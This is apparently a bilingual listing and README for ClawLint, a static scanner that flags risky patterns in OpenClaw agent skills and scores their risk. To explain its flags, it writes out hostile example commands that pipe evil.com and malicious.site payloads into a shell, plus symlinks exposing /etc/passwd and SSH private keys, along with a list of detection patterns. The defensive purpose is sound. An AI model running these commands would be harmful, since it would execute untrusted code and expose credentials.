什么是 ClawLint 安全扫描器？

ClawLint 是一款专为 Openclaw 技能设计的安全审计工具。它在不执行代码的情况下，对已安装的技能进行深层静态代码分析，从而可以安全地用于不受信任的第三方贡献。通过扫描工作区和系统目录，它可以识别危险行为，如远程执行、凭据窃取和未经授权的文件系统访问。

由于社区贡献的工具中可能有很大一部分存在缺陷，ClawLint 作为关键的防御层发挥作用。它通过数值评分和完整性监控，为开发人员和系统管理员提供透明的风险评估，确保环境中的每个技能都经过验证且安全。

下载入口:https://github.com/openclaw/skills/tree/main/skills/parthghumatkar/claw-lint

安装与下载

1. ClawHub CLI

从源直接安装技能的最快方式。

2. 手动安装

将技能文件夹复制到以下位置之一

优先级：工作区 > 本地 > 内置

3. 提示词安装

将此提示词复制到 OpenClaw 即可自动安装。

ClawLint 安全扫描器 应用场景

• 在首次执行前，审计来自不受信任社区源的 Openclaw 技能。
• 检测脚本中隐藏的后门、凭据收集器或恶意远程执行模式。
• 使用 SHA256 哈希监控关键任务技能的文件完整性，以识别未经授权的篡改。
• 将安全门禁集成到 CI/CD 流水线中，自动阻止高风险技能进入生产环境。

1. 扫描器对技能目录进行静态分析，定位 Shell 脚本和二进制文件。
2. 搜索特定的高风险模式，例如将远程内容通过管道传输到 Shell 或访问敏感的 SSH 目录。
3. 根据检测到的标记，计算从 0（安全）到 100（严重）的加权风险得分。
4. 如果需要，它会为技能中的每个文件生成 SHA256 校验和，以创建安全基准。
5. 最终报告以易于阅读的表格或机器可读的 JSON 对象呈现，以便于自动化处理。

ClawLint 安全扫描器 配置指南

ClawLint 需要 Bash 4.0+ 和标准 Unix 实用程序。按照以下步骤开始审计您的 Openclaw 技能：

# 对所有已安装的技能运行摘要扫描
./bin/claw-lint.sh

# 按名称审计特定技能
./bin/claw-lint.sh --skill hashnode-publisher

# 使用 SHA256 哈希生成完整的安全清单
./bin/claw-lint.sh --full --format json > security-audit.json

ClawLint 安全扫描器 数据架构与分类体系

ClawLint 将其安全发现整理为结构化格式。JSON 输出包含一个带有扫描元数据的根对象和一个详细的结果数组：

name: claw-lint
description: Security scanner for OpenClaw skills. Detects malware and backdoors before execution, scores risk levels, and monitors file integrity through static code analysis.

ClawLint

Security linter for OpenClaw skills

Runs a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.

With 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run.

Summary

ClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines.

What It Does

• Risk scoring — assigns a numeric risk score (0-100) based on detected patterns
• Audit flags — identifies suspicious behaviors (remote execution, secret access, etc.)
• Inventory mode — optional SHA256 hashing of all files for change detection
• JSON output — machine-readable results (requires Python 3)
• No execution — static analysis only, safe to run on untrusted skills

Quick Start

Scan all skills (summary view)

{baseDir}/bin/claw-lint.sh

Scan one specific skill

{baseDir}/bin/claw-lint.sh --skill 

Example: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher

Full inventory with SHA256 hashes

{baseDir}/bin/claw-lint.sh --full --skill 

JSON output (requires Python 3)

{baseDir}/bin/claw-lint.sh --format json

Options

Understanding the Output

Risk Score

• 0-30: Low risk (common patterns, minimal concerns)
• 31-60: Medium risk (network access, file operations)
• 61-100: High risk (remote execution, credential access, system tampering)

Common Flags

• pipes_remote_to_shell — downloads and executes remote code
• downloads_remote_content — fetches external files
• has_executables — contains binary files
• uses_ssh_or_scp — SSH/SCP operations
• contains_symlinks — symbolic links present

Example Output

SCORE  SKILL                FILES  SIZE     FLAGS
-----  -----                -----  ----     -----
57     hashnode-publisher   2      1.1KB    downloads_remote_content,pipes_remote_to_shell
45     ec2-health-monitor   2      1.9KB    pipes_remote_to_shell

Risk Scoring Details

ClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:

Scoring Factors

• +25 points: Remote execution patterns (curl | bash, wget -O-, nc)
• +30 points: Secret/credential access (~/.openclaw/credentials, ~/.ssh/)
• +20 points: Privilege escalation (sudo, setuid, chmod +s)
• +15 points: Code obfuscation (base64 decode, eval, exec in suspicious contexts)
• +10 points: External network calls (curl, wget, http requests)
• +10 points: File system operations outside skill directory
• +5 points: Use of /tmp or world-writable directories

Audit Flags Explained

pipes_remote_to_shell

Downloads and executes external code without verification.

Examples:

curl https://evil.com/script.sh | bash
wget -O- https://malicious.site/payload | sh

Risk: Critical. Remote code execution vector for malware.

downloads_remote_content

Fetches external files or data from the internet.

Examples:

curl -O https://example.com/file.tar.gz
wget https://cdn.example.com/data.json

Risk: Medium-High. Potential supply chain attack or data exfiltration.

has_executables

Contains compiled binary files (not shell scripts).

Examples:

• ELF binaries
• Compiled programs

Risk: Medium. Harder to audit, may contain hidden functionality.

uses_ssh_or_scp

Performs SSH/SCP operations.

Examples:

ssh user@remote.host "command"
scp file.txt user@remote:/path/

Risk: Medium. Potential for unauthorized remote access or data transfer.

contains_symlinks

Includes symbolic links that may point outside skill directory.

Examples:

ln -s /etc/passwd exposed_file
ln -s ~/.ssh/id_rsa key_link

Risk: Low-Medium. May expose sensitive files or create confusion.

Requirements

• Bash 4.0+
• Standard Unix tools: find, grep, awk, sha256sum, stat
• Python 3 (optional, for JSON output only)

Works on Ubuntu/Debian without sudo. Designed for EC2 and similar environments.

Why Use This?

• Audit skills before installation
• Detect backdoors or malicious patterns in community skills
• Track changes to installed skills with SHA256 inventory
• Enforce security policies in automated pipelines

Output Formats

Terminal Output (Default)

Human-readable table format with color-coded risk scores (when terminal supports colors).

JSON Output (--format json)

Machine-readable structure for integration with CI/CD pipelines:

{
  "scan_date": "2026-02-13T14:50:00Z",
  "skills_scanned": 12,
  "high_risk_count": 2,
  "results": [
    {
      "skill_name": "hashnode-publisher",
      "risk_score": 57,
      "file_count": 2,
      "total_size": "1.1KB",
      "flags": ["downloads_remote_content", "pipes_remote_to_shell"],
      "files": [
        {
          "path": "bin/publish.sh",
          "sha256": "a1b2c3d4...",
          "size": 896
        }
      ]
    }
  ]
}

Best Practices

Regular Audits

Run ClawLint after installing or updating skills:

{baseDir}/bin/claw-lint.sh --min-score 50

Baseline Inventory

Create a security baseline for production environments:

{baseDir}/bin/claw-lint.sh --full --format json > baseline.json

Re-run periodically and diff against baseline to detect tampering.

CI/CD Integration

Add to your deployment pipeline:

# Fail build if any skill scores above 60
{baseDir}/bin/claw-lint.sh --format json | python3 -c "
import json, sys
data = json.load(sys.stdin)
high_risk = [s for s in data['results'] if s['risk_score'] > 60]
if high_risk:
    print(f'? {len(high_risk)} high-risk skills detected')
    sys.exit(1)
"

Whitelist Trusted Skills

For known-safe skills with legitimate flags, document exceptions:

# Example: hashnode-publisher needs network access
{baseDir}/bin/claw-lint.sh --skill hashnode-publisher
# Expected score: 45-60 (downloads_remote_content is legitimate)

Limitations

• Static analysis only — cannot detect runtime behavior or dynamically generated code
• Pattern-based — may have false positives for legitimate use cases
• No sandbox — does not execute or test skills
• Local files only — scans installed skills, not ClawHub packages before install

For comprehensive security, combine ClawLint with:

• Manual code review for critical skills
• VirusTotal scanning for executables
• Runtime monitoring and sandboxing
• Regular security updates

Contributing

Report false positives or suggest new detection patterns at the OpenClaw security repository.

License

MIT License - Free to use, modify, and distribute.